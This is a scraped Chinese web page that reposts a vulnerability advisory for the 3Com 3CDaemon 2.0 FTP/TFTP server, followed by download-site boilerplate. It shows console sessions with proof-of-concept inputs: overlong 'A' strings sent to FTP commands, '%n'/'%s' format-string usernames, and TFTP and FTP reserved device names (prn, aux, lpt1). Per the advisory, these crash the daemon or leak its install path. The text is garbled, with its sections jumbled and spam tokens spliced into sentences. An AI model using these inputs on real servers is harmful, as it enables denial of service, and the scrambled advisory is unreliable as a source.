提交超长用户名可导致缓冲区溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or 最新载missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、
1、版下
作用:FTP,最新载聊天AITFTP,SYSLOG服侍器,FTP用户名存在格式串难题:
提交包含格式串字符作为用户名数字,版下可导致TFTP服侍程序挂起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 最新载aitext3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,版下aigif可导致程序崩溃。最新载提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、版下可导致守护程序崩溃:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok,最新载 need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、格式串及缓冲区溢出等进攻。版下多个FTP命令存在格式串难题
提交格式字符串作为参数,最新载TFTP保留设备名回绝服侍进攻:
提交类似如下的版下请求,TFTP顾客端
3CDaemon存在多个安稳难题,最新载多个FTP命令超长参数缓冲区溢出:
cd,版下send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,3com的最新载这款东西还是很有名很不错滴~~~3CDaemon是一款无偿的集成了TFTP、不用我说了吧,FTP和SYSLOG作用的应用程序。
6、远程进攻者可以利用这些漏洞进行回绝服侍、多个FTP命令包设备名资讯泄露难题
请求保留设备名可导致返回程序安装路径资讯:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受效应体系:
3Com 3CDaemon 2.0 revision 10
热点
不用我说了吧,3com的这款东西还是很有名很不错滴~~~3CDaemon是一款无偿的集成了TFTP、FTP和SYSLOG作用的应用程序。作用:FTP,TFTP,SYSLOG服侍器,TFTP顾客端 3C -聊天AI
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。
相关文章-
酷米客公交电脑版无偿版下载
2026-04-24 23:41
-
foobar2000下载
2026-04-24 23:12
-
foxmail安卓版客户端下载
2026-04-24 22:40
-
学小易搜题app下载
2026-04-24 22:16
网友点评
热门资讯
关注我们
关注微信公众号,了解最新精彩内容







精彩导读